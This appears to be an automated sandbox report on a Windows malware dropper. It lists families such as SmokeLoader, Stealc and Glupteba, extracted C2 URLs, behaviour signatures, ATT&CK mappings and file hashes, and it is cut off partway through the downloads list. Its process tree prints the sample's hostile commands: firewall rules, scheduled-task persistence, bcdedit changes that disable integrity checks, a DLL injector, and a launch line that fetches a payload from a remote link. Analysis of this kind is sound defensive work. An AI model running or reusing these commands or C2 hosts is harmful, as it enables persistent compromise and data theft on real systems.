Overview

overview

10

Static

static

1

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    294s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 22:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4.exe

  • Size

    3.4MB

  • MD5

    886e5d7f4e35c0bb6164dc74bf5e371b

  • SHA1

    009dd91c1ecfa4c39374437f7415871144aaa88b

  • SHA256

    37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4

  • SHA512

    b0518c38397749e249e716634541fb9901961ae78734711ef7d7a6446aba4e3d60d073f03532e6aa32f2320a5c30e817647b7aa077b5978b0f0d407375e89994

  • SSDEEP

    49152:eg6HD4YPpoVBQQAbNwmW6Vvfw5ADqfzgF4Cdypovv:0VBFsGvkAF3

Score
10/10
dcratgluptebaprivateloadersmokeloaderstealczgratbackdoordiscoverydropperevasioninfostealerloaderpersistenceratrootkitspywarestealerthemidatrojanupx

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://cellc.org/tmp/index.php

http://h-c-v.ru/tmp/index.php

http://icebrasilpr.com/tmp/index.php

http://piratia-life.ru/tmp/index.php

http://piratia.su/tmp/index.php
rc4.i32
rc4.i32

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 14 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
    evasion
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Windows security bypass 2 TTPs 10 IoCs
    evasiontrojan
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 47 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 11 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4.exe
    "C:\Users\Admin\AppData\Local\Temp\37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Users\Admin\Pictures\rx8aobajQgPi2jYCndovZLgh.exe
        "C:\Users\Admin\Pictures\rx8aobajQgPi2jYCndovZLgh.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Users\Admin\AppData\Local\Temp\u23w.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u23w.0.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:852
        • C:\Users\Admin\AppData\Local\Temp\u23w.1.exe
          "C:\Users\Admin\AppData\Local\Temp\u23w.1.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2680
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:628
      • C:\Users\Admin\Pictures\h0leOmUjjNKQgXZ4Ub4iSUF3.exe
        "C:\Users\Admin\Pictures\h0leOmUjjNKQgXZ4Ub4iSUF3.exe"
        3⤵
        • Modifies firewall policy service
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Drops file in System32 directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:2264
      • C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe
        "C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2224
        • C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe
          "C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Loads dropped DLL
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:576
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Modifies data under HKEY_USERS
                PID:2092
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • Manipulates WinMon driver.
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:2176
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:2272
              • C:\Windows\system32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:2124
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies system certificate store
                  PID:2516
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1676
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2688
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2548
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:876
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:884
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1628
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2712
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2452
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2196
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1640
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1688
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -timeout 0
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1788
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2888
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  PID:1048
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\Sysnative\bcdedit.exe /v
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1756
                • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                  6⤵
                  • Executes dropped EXE
                  PID:1432
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:1480
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:2924
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1832
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                    6⤵
                    • Executes dropped EXE
                    PID:2084
                  • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    6⤵
                    • Executes dropped EXE
                    PID:2852
                  • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1600
            • C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe
              "C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2716
              • C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe
                "C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1540
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2740
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    6⤵
                    • Modifies Windows Firewall
                    PID:1668
            • C:\Users\Admin\Pictures\9vHJJFiKQG3A5il8SIXTMMso.exe
              "C:\Users\Admin\Pictures\9vHJJFiKQG3A5il8SIXTMMso.exe"
              3⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:1876
            • C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe
              "C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:868
              • C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe
                "C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1032
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    6⤵
                    • Modifies Windows Firewall
                    • Modifies data under HKEY_USERS
                    PID:2364
            • C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe
              "C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1584
              • C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe
                "C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                PID:2944
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                    PID:1656
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      6⤵
                      • Modifies Windows Firewall
                      • Modifies data under HKEY_USERS
                      PID:2108
          • C:\Windows\system32\makecab.exe
            "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509224957.log C:\Windows\Logs\CBS\CbsPersist_20240509224957.cab
            1⤵
            • Drops file in Windows directory
            PID:2456
          • C:\Users\Admin\AppData\Local\Temp\8EA9.exe
            C:\Users\Admin\AppData\Local\Temp\8EA9.exe
            1⤵
            • Executes dropped EXE
            PID:2956
          • C:\Windows\system32\conhost.exe
            \??\C:\Windows\system32\conhost.exe "10871778121052380947-246787217-16831392861181993327-10674469682943562681630954736"
            1⤵
              PID:852
            • C:\Windows\windefender.exe
              C:\Windows\windefender.exe
              1⤵
              • Executes dropped EXE
              • Modifies data under HKEY_USERS
              PID:2312

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            Scheduled Task/Job

            1
            T1053

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            2
            T1543

            Windows Service

            2
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            2
            T1543

            Windows Service

            2
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Defense Evasion

            Impair Defenses

            4
            T1562

            Disable or Modify System Firewall

            1
            T1562.004

            Disable or Modify Tools

            2
            T1562.001

            Modify Registry

            5
            T1112

            Subvert Trust Controls

            1
            T1553

            Install Root Certificate

            1
            T1553.004

            Virtualization/Sandbox Evasion

            1
            T1497

            Credential Access

            Unsecured Credentials

            3
            T1552

            Credentials In Files

            3
            T1552.001

            Discovery

            Peripheral Device Discovery

            1
            T1120

            Query Registry

            6
            T1012

            System Information Discovery

            6
            T1082

            Virtualization/Sandbox Evasion

            1
            T1497

            Lateral Movement

            Collection

            Data from Local System

            3
            T1005

            Command and Control

            Web Service

            1
            T1102

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
              Filesize

              68KB

              MD5

              29f65ba8e88c063813cc50a4ea544e93

              SHA1

              05a7040d5c127e68c25d81cc51271ffb8bef3568

              SHA256

              1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

              SHA512

              e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              304B

              MD5

              774063d0a9486f726db3233012e7246f

              SHA1

              8c2f1c9be59fa7839df3a1800b35d1226561bd4b

              SHA256

              2aa6a585fcd0f428b4b7ac8e8eadd4c57a22c6fd1435d35ae4089a277fd39907

              SHA512

              b526126a8462f56d649f5ca71b7b5c8f56aa2dd086579303b000dd149a982ba2a71a44e132af124a13e064a7f28592098cf8b608605b2f4a17ae097327b07951

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              304B

              MD5

              12cc34562fab900169e82c66a87332a8

              SHA1

              9c4701c351d38f46300a0be2344b47d31bdd3e1f

              SHA256

              c400a006977026b42cc225a2c6469591a1b6e93f570541ae1393be5a1949df2f

              SHA512

              60c4b0a625f6f39c63753312adf8828943cc4d930dba28e6abed9670d5c4907b84c12fff3730448649e8c56d46537195f30aa3eb2eaf1f5e5102e9cac2763119

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              304B

              MD5

              3ff6f2be2f58c4ba253ef2a38892f9d4

              SHA1

              3aae2e87defdb6a55be3bc1c873909031bd1d120

              SHA256

              efef4c7d70445fa64069e46d1deb2e301fbf5c13991fe5538fbbdad97007761e

              SHA512

              099c8c3a194722a4b0fdc657e09c46dea1e3dd073a39756961d2bf95fdc7b54c23fa2fa4b62c8e68b645191b9067322436f9b43e3e538123ed536f3cf5010e94

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\bd92d7984d802ff9a1e24336bd1ccb4209c69a1bd116225cd9479ac9d0f516c4\52215b879a954e3eb58a16fa8f586599.tmp
              Filesize

              1KB

              MD5

              356139ec3e026ad80fdc761a00a07a72

              SHA1

              d8b8f218668322983c78ededf0e589267724d569

              SHA256

              1904e6a474d9a93eb417e70c2fa1d8fa0a824edc31ee2f27fc0007c724761328

              SHA512

              c6ef91dbef213c42fa7734cdff91dcd5f0f967fad72bdad3cd134e32baa14e8cf45edfabd7d4edf6e5cc6de0a60ad11dffd5311d9dcbebdaa65ce76a5e1d7f8b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\8EA9.exe
              Filesize

              331KB

              MD5

              cc193035cd8f2bbd157ff4987775fbce

              SHA1

              62c5c7fb9ea684901b096993ffa94ccd061f7a7b

              SHA256

              95cee0c04c33b542a2d8d1f675b2c6610d91e9a406d744e9fef9197b8be57b6a

              SHA512

              157d687bb89b960b32da06b27edbd85d474531bfe7395bffa30fb207f6fcd1f57ce834f2d87b839d75b5200dafc69b72649c801c0876f4bee2c3e98695fb855c

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Cab233C.tmp
              Filesize

              65KB

              MD5

              ac05d27423a85adc1622c714f2cb6184

              SHA1

              b0fe2b1abddb97837ea0195be70ab2ff14d43198

              SHA256

              c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

              SHA512

              6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
              Filesize

              8.3MB

              MD5

              fd2727132edd0b59fa33733daa11d9ef

              SHA1

              63e36198d90c4c2b9b09dd6786b82aba5f03d29a

              SHA256

              3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

              SHA512

              3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
              Filesize

              492KB

              MD5

              fafbf2197151d5ce947872a4b0bcbe16

              SHA1

              a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

              SHA256

              feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

              SHA512

              acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Tar234E.tmp
              Filesize

              171KB

              MD5

              9c0c641c06238516f27941aa1166d427

              SHA1

              64cd549fb8cf014fcd9312aa7a5b023847b6c977

              SHA256

              4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

              SHA512

              936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Tar240F.tmp
              Filesize

              177KB

              MD5

              435a9ac180383f9fa094131b173a2f7b

              SHA1

              76944ea657a9db94f9a4bef38f88c46ed4166983

              SHA256

              67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

              SHA512

              1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
              Filesize

              2.0MB

              MD5

              1bf850b4d9587c1017a75a47680584c4

              SHA1

              75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

              SHA256

              ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

              SHA512

              ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
              Filesize

              2.8MB

              MD5

              713674d5e968cbe2102394be0b2bae6f

              SHA1

              90ac9bd8e61b2815feb3599494883526665cb81e

              SHA256

              f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

              SHA512

              e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
              Filesize

              2.0MB

              MD5

              dcb505dc2b9d8aac05f4ca0727f5eadb

              SHA1

